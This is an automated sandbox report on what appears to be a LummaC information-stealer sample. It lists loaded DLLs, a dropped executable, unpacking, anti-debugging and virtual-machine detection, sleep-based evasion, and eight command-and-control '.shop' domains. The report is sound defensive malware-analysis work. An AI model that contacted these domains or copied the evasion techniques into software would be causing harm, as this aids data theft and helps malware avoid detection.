Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Unpacked PE file: 4.2.NDWffRLk7z.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.loyuho:W;.cec:W;.yej:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Unpacked PE file: 7.2.89AC.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.nosu:W;.muwav:W;.roxah:R;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Unpacked PE file: 4.2.NDWffRLk7z.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Unpacked PE file: 7.2.89AC.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_0041EC4E

Source: NDWffRLk7z.exe	Static PE information: section name: .loyuho
Source: NDWffRLk7z.exe	Static PE information: section name: .cec
Source: NDWffRLk7z.exe	Static PE information: section name: .yej
Source: ScreenUpdateSync[1].exe.4.dr	Static PE information: section name: .nosu
Source: ScreenUpdateSync[1].exe.4.dr	Static PE information: section name: .muwav
Source: ScreenUpdateSync[1].exe.4.dr	Static PE information: section name: .roxah
Source: 89AC.tmp.exe.4.dr	Static PE information: section name: .nosu
Source: 89AC.tmp.exe.4.dr	Static PE information: section name: .muwav
Source: 89AC.tmp.exe.4.dr	Static PE information: section name: .roxah

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00410756 push ecx; ret	4_2_00410769
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0040FD82 push ecx; ret	4_2_0040FD95
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0058E039 push 00000003h; ret	4_2_0058E03D
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0058C27C push es; iretd	4_2_0058C28D
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0058D34C push ds; ret	4_2_0058D355
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00590648 pushad ; ret	4_2_00590664
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_005907C5 push ecx; ret	4_2_005907E2
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0214798F push esp; retf	4_2_02147997
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_021209BD push ecx; ret	4_2_021209D0
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0212CE08 push es; retf	4_2_0212CE0D
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02147F8D push esp; retf	4_2_02147F8E
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0211FFE9 push ecx; ret	4_2_0211FFFC
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02149DD8 pushad ; retf	4_2_02149DDF
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0214DDCE push dword ptr [esp+ecx-75h]; iretd	4_2_0214DDD2
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00441850 push eax; mov dword ptr [esp], 0E0908DBh	7_2_00441853
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_007972DE push esi; retn 001Ch	7_2_007972E2
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00798775 pushfd ; ret	7_2_00798776
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00796736 push ebx; ret	7_2_00796737
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0079870A pushad ; ret	7_2_0079870B
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0214B05A push ebp; iretd	7_2_0214B05D
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02161AB7 push eax; mov dword ptr [esp], 0E0908DBh	7_2_02161ABA

Source: NDWffRLk7z.exe	Static PE information: section name: .text entropy: 7.542844670244443
Source: ScreenUpdateSync[1].exe.4.dr	Static PE information: section name: .text entropy: 7.417548317236182
Source: 89AC.tmp.exe.4.dr	Static PE information: section name: .text entropy: 7.417548317236182

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	File created: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W9FILL1W\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_0040E96A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_0040E96A

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Window / User API: threadDelayed 368			Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Window / User API: threadDelayed 9620			Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_4-64927

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\NDWffRLk7z.exe TID: 7204	Thread sleep count: 368 > 30	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe TID: 7204	Thread sleep time: -265696s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe TID: 7204	Thread sleep count: 9620 > 30	Jump to behavior
Source: C:\Users\user\Desktop\NDWffRLk7z.exe TID: 7204	Thread sleep time: -6945640s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe TID: 7280	Thread sleep time: -60000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_004389E2 FindFirstFileExW,		4_2_004389E2
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02148C49 FindFirstFileExW,		4_2_02148C49

Source: Amcache.hve.10.dr	Binary or memory string: VMware
Source: Amcache.hve.10.dr	Binary or memory string: VMware-42 27 b7 a3 1e b0 86 f3-0a fe 06 07 d0 80 07 92
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.10.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1hbin@
Source: NDWffRLk7z.exe, 00000004.00000002.3748901617.00000000005C7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0
Source: Amcache.hve.10.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.10.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: NDWffRLk7z.exe, 00000004.00000003.3617507302.0000000000618000.00000004.00000020.00020000.00000000.sdmp, NDWffRLk7z.exe, 00000004.00000002.3750636895.0000000000618000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000003.1381500917.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.10.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 89AC.tmp.exe, 00000007.00000003.1381500917.0000000000813000.00000004.00000020.00020000.00000000.sdmp, 89AC.tmp.exe, 00000007.00000002.1602056562.0000000000813000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWFo
Source: Amcache.hve.10.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.10.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.10.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.10.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.10.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.10.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.10.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.10.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.10.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.10.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.10.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.10.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: 89AC.tmp.exe, 00000007.00000002.1601827607.00000000007DB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp6
Source: Amcache.hve.10.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe

Code function: 7_2_004402C0 LdrInitializeThunk,

7_2_004402C0

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_0042A3C3

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_0041EC4E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

4_2_0041EC4E

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0042FE4F mov eax, dword ptr fs:[00000030h]	4_2_0042FE4F
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0058AD0B push dword ptr fs:[00000030h]	4_2_0058AD0B
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_021400B6 mov eax, dword ptr fs:[00000030h]	4_2_021400B6
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0211092B mov eax, dword ptr fs:[00000030h]	4_2_0211092B
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_02110D90 mov eax, dword ptr fs:[00000030h]	4_2_02110D90
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_00793663 push dword ptr fs:[00000030h]	7_2_00793663
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_0212092B mov eax, dword ptr fs:[00000030h]	7_2_0212092B
Source: C:\Users\user\AppData\Local\Temp\89AC.tmp.exe	Code function: 7_2_02120D90 mov eax, dword ptr fs:[00000030h]	7_2_02120D90

Source: C:\Users\user\Desktop\NDWffRLk7z.exe

Code function: 4_2_0043BBB1 GetProcessHeap,

4_2_0043BBB1

Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0042A3C3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0042A3C3
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_004104C3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_004104C3
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_00410656 SetUnhandledExceptionFilter,	4_2_00410656
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0040F907 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0040F907
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0213A62A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0213A62A
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0212072A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	4_2_0212072A
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_0211FB6E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	4_2_0211FB6E
Source: C:\Users\user\Desktop\NDWffRLk7z.exe	Code function: 4_2_021208BD SetUnhandledExceptionFilter,	4_2_021208BD

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 89AC.tmp.exe	String found in binary or memory: robinsharez.shop
Source: 89AC.tmp.exe	String found in binary or memory: handscreamny.shop
Source: 89AC.tmp.exe	String found in binary or memory: chipdonkeruz.shop
Source: 89AC.tmp.exe	String found in binary or memory: versersleep.shop
Source: 89AC.tmp.exe	String found in binary or memory: crowdwarek.shop
Source: 89AC.tmp.exe	String found in binary or memory: apporholis.shop
Source: 89AC.tmp.exe	String found in binary or memory: femalsabler.shop
Source: 89AC.tmp.exe	String found in binary or memory: soundtappysk.shop
